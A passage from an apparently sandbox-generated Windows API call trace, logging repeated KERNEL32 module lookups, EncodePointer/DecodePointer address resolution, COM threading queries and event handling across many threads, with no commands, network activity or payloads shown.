| out: lpsz="kernel32.dll") returned 0xc [0179.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.884] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.884] SysReAllocStringLen (in: pbstr=0xb66f778*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f778*="KERNEL32.DLL") returned 1 [0179.884] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.888] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0179.891] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0180.978] SysReAllocStringLen (in: pbstr=0xb66fa50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66fa50*="KERNEL32.DLL") returned 1 [0180.978] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0180.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0180.982] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 159 os_tid = 0xb50 [0179.918] SysReAllocStringLen (in: pbstr=0x16bdf824*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bdf824*="KERNEL32.DLL") returned 1 [0179.918] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.921] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.922] SysReAllocStringLen (in: pbstr=0x16bdf824*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bdf824*="KERNEL32.DLL") returned 1 [0179.922] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.922] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.924] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0179.925] SysReAllocStringLen (in: pbstr=0x16bdf800*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bdf800*="KERNEL32.DLL") returned 1 [0179.925] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0179.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0179.927] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0179.930] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0181.260] SysReAllocStringLen (in: pbstr=0x16bdfad8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bdfad8*="KERNEL32.DLL") returned 1 [0181.260] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0181.261] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.263] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 160 os_tid = 0x4e0 [0181.874] SysReAllocStringLen (in: pbstr=0xb69f44c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f44c*="KERNEL32.DLL") returned 1 [0181.874] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0181.875] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.877] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0181.877] SysReAllocStringLen (in: pbstr=0xb69f44c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f44c*="KERNEL32.DLL") returned 1 [0181.877] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0181.878] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.880] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0181.880] SysReAllocStringLen (in: pbstr=0xb69f428*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f428*="KERNEL32.DLL") returned 1 [0181.880] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0181.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0181.883] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0181.886] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0182.165] SysReAllocStringLen (in: pbstr=0xb69f700*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb69f700*="KERNEL32.DLL") returned 1 [0182.165] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0182.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0182.168] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 161 os_tid = 0xb14 [0182.884] SysReAllocStringLen (in: pbstr=0xb67f6e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb67f6e4*="KERNEL32.DLL") returned 1 [0182.884] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0182.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0182.888] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0182.889] SysReAllocStringLen (in: pbstr=0xb67f6e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb67f6e4*="KERNEL32.DLL") returned 1 [0182.889] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0182.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0182.893] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0182.894] SysReAllocStringLen (in: pbstr=0xb67f6c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb67f6c0*="KERNEL32.DLL") returned 1 [0182.894] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0182.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0182.898] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0182.901] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0183.172] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0205.657] CoGetContextToken (in: pToken=0xb67f29c | out: pToken=0xb67f29c) returned 0x0 [0205.657] IUnknown:QueryInterface (in: This=0xb51e28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xb67f2c0 | out: ppvObject=0xb67f2c0*=0xb51e34) returned 0x0 [0205.658] IComThreadingInfo:GetCurrentThreadType (in: This=0xb51e34, pThreadType=0xb67f2ec | out: pThreadType=0xb67f2ec*=0) returned 0x0 [0205.658] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.658] GetCurrentThreadId () returned 0xb14 [0205.658] ResetEvent (hEvent=0xb8) returned 1 [0205.658] GetCurrentThreadId () returned 0xb14 [0205.658] GetCurrentThreadId () returned 0xb14 [0205.658] GetCurrentThreadId () returned 0xb14 [0205.658] ResetEvent (hEvent=0xb8) returned 1 [0205.658] GetCurrentThreadId () returned 0xb14 [0205.658] GetCurrentThreadId () returned 0xb14 [0205.658] SetEvent (hEvent=0xbc) returned 1 [0205.659] SetEvent (hEvent=0xb8) returned 1 [0205.659] CloseHandle (hObject=0x264) returned 1 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] ResetEvent (hEvent=0xb8) returned 1 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] ResetEvent (hEvent=0xb8) returned 1 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] SetEvent (hEvent=0xbc) returned 1 [0205.659] SetEvent (hEvent=0xb8) returned 1 [0205.659] CloseHandle (hObject=0x320) returned 1 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] ResetEvent (hEvent=0xb8) returned 1 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] GetCurrentThreadId () returned 0xb14 [0205.659] ResetEvent (hEvent=0xb8) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] SetEvent (hEvent=0xbc) returned 1 [0205.660] SetEvent (hEvent=0xb8) returned 1 [0205.660] CloseHandle (hObject=0x27c) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] ResetEvent (hEvent=0xb8) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] ResetEvent (hEvent=0xb8) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] SetEvent (hEvent=0xbc) returned 1 [0205.660] SetEvent (hEvent=0xb8) returned 1 [0205.660] CloseHandle (hObject=0x280) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] ResetEvent (hEvent=0xb8) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] ResetEvent (hEvent=0xb8) returned 1 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] GetCurrentThreadId () returned 0xb14 [0205.660] SetEvent (hEvent=0xbc) returned 1 [0205.660] SetEvent (hEvent=0xb8) returned 1 [0205.661] CloseHandle (hObject=0x5a0) returned 1 [0205.663] SysReAllocStringLen (in: pbstr=0xb67f998*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb67f998*="KERNEL32.DLL") returned 1 [0205.663] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0205.664] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0205.667] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 164 os_tid = 0x6a8 [0183.827] SysReAllocStringLen (in: pbstr=0x168bf904*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168bf904*="KERNEL32.DLL") returned 1 [0183.827] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0183.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0183.831] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0183.832] SysReAllocStringLen (in: pbstr=0x168bf904*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168bf904*="KERNEL32.DLL") returned 1 [0183.832] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0183.832] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0183.836] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0183.836] SysReAllocStringLen (in: pbstr=0x168bf8e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168bf8e0*="KERNEL32.DLL") returned 1 [0183.836] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0183.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0183.839] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0183.843] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0184.553] SysReAllocStringLen (in: pbstr=0x168bfbb8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168bfbb8*="KERNEL32.DLL") returned 1 [0184.553] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0184.554] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0184.557] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 171 os_tid = 0x870 [0185.069] SysReAllocStringLen (in: pbstr=0x168df4d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df4d4*="KERNEL32.DLL") returned 1 [0185.069] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.070] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.073] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.073] SysReAllocStringLen (in: pbstr=0x168df4d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df4d4*="KERNEL32.DLL") returned 1 [0185.073] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.074] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.077] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.077] SysReAllocStringLen (in: pbstr=0x168df4b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df4b0*="KERNEL32.DLL") returned 1 [0185.077] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.081] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0185.084] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.129] SysReAllocStringLen (in: pbstr=0x168df788*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168df788*="KERNEL32.DLL") returned 1 [0185.129] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.130] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.133] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 172 os_tid = 0xa8c [0185.908] SysReAllocStringLen (in: pbstr=0x16bbf78c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bbf78c*="KERNEL32.DLL") returned 1 [0185.908] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.912] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.912] SysReAllocStringLen (in: pbstr=0x16bbf78c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bbf78c*="KERNEL32.DLL") returned 1 [0185.912] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.913] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.915] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0185.915] SysReAllocStringLen (in: pbstr=0x16bbf768*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bbf768*="KERNEL32.DLL") returned 1 [0185.915] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0185.915] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0185.918] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0185.920] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0186.408] SysReAllocStringLen (in: pbstr=0x16bbfa40*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16bbfa40*="KERNEL32.DLL") returned 1 [0186.408] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0186.409] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0186.413] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 173 os_tid = 0x340 [0186.458] SysReAllocStringLen (in: pbstr=0x16ccf594*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16ccf594*="KERNEL32.DLL") returned 1 [0186.458] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0186.459] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0186.462] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0186.462] SysReAllocStringLen (in: pbstr=0x16ccf594*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16ccf594*="KERNEL32.DLL") returned 1 [0186.462] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0186.463] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0186.466] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0186.466] SysReAllocStringLen (in: pbstr=0x16ccf570*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16ccf570*="KERNEL32.DLL") returned 1 [0186.466] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0186.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0186.469] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0186.472] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0186.736] SysReAllocStringLen (in: pbstr=0x16ccf848*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16ccf848*="KERNEL32.DLL") returned 1 [0186.736] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0186.741] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0186.744] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 174 os_tid = 0xad0 [0189.185] SysReAllocStringLen (in: pbstr=0x16b9f864*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9f864*="KERNEL32.DLL") returned 1 [0189.185] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0189.185] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0189.188] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0189.188] SysReAllocStringLen (in: pbstr=0x16b9f864*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9f864*="KERNEL32.DLL") returned 1 [0189.188] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0189.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0189.191] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0189.191] SysReAllocStringLen (in: pbstr=0x16b9f840*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9f840*="KERNEL32.DLL") returned 1 [0189.191] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0189.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0189.194] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0189.197] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0189.559] SysReAllocStringLen (in: pbstr=0x16b9fb18*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b9fb18*="KERNEL32.DLL") returned 1 [0189.559] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0189.559] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0189.562] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 180 os_tid = 0xabc [0193.041] SysReAllocStringLen (in: pbstr=0x168ef62c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef62c*="KERNEL32.DLL") returned 1 [0193.041] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.044] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.044] SysReAllocStringLen (in: pbstr=0x168ef62c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef62c*="KERNEL32.DLL") returned 1 [0193.044] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.044] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.047] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.047] SysReAllocStringLen (in: pbstr=0x168ef608*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef608*="KERNEL32.DLL") returned 1 [0193.047] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.047] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.050] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0193.052] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0193.285] SysReAllocStringLen (in: pbstr=0x168ef8e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef8e0*="KERNEL32.DLL") returned 1 [0193.285] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0193.285] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0193.288] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 184 os_tid = 0x4e8 [0194.033] SysReAllocStringLen (in: pbstr=0x16b7f8b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7f8b4*="KERNEL32.DLL") returned 1 [0194.034] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.034] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.037] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.037] SysReAllocStringLen (in: pbstr=0x16b7f8b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7f8b4*="KERNEL32.DLL") returned 1 [0194.037] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.040] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.040] SysReAllocStringLen (in: pbstr=0x16b7f890*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7f890*="KERNEL32.DLL") returned 1 [0194.040] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.043] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0194.046] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.318] SysReAllocStringLen (in: pbstr=0x16b7fb68*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16b7fb68*="KERNEL32.DLL") returned 1 [0194.318] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.322] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 185 os_tid = 0x2ac [0194.107] SysReAllocStringLen (in: pbstr=0x16d7fa64*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7fa64*="KERNEL32.DLL") returned 1 [0194.107] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.108] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.111] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.111] SysReAllocStringLen (in: pbstr=0x16d7fa64*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7fa64*="KERNEL32.DLL") returned 1 [0194.111] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.114] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.114] SysReAllocStringLen (in: pbstr=0x16d7fa40*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7fa40*="KERNEL32.DLL") returned 1 [0194.114] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.117] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0194.119] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.520] SysReAllocStringLen (in: pbstr=0x16d7fd18*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x16d7fd18*="KERNEL32.DLL") returned 1 [0194.520] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.520] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.523] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 187 os_tid = 0xc4 [0194.223] SysReAllocStringLen (in: pbstr=0x168ffa0c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ffa0c*="KERNEL32.DLL") returned 1 [0194.223] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.224] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.226] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.226] SysReAllocStringLen (in: pbstr=0x168ffa0c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ffa0c*="KERNEL32.DLL") returned 1 [0194.226] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.227] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.229] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0194.229] SysReAllocStringLen (in: pbstr=0x168ff9e8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ff9e8*="KERNEL32.DLL") returned 1 [0194.229] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0194.230] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0194.232] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0194.234] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 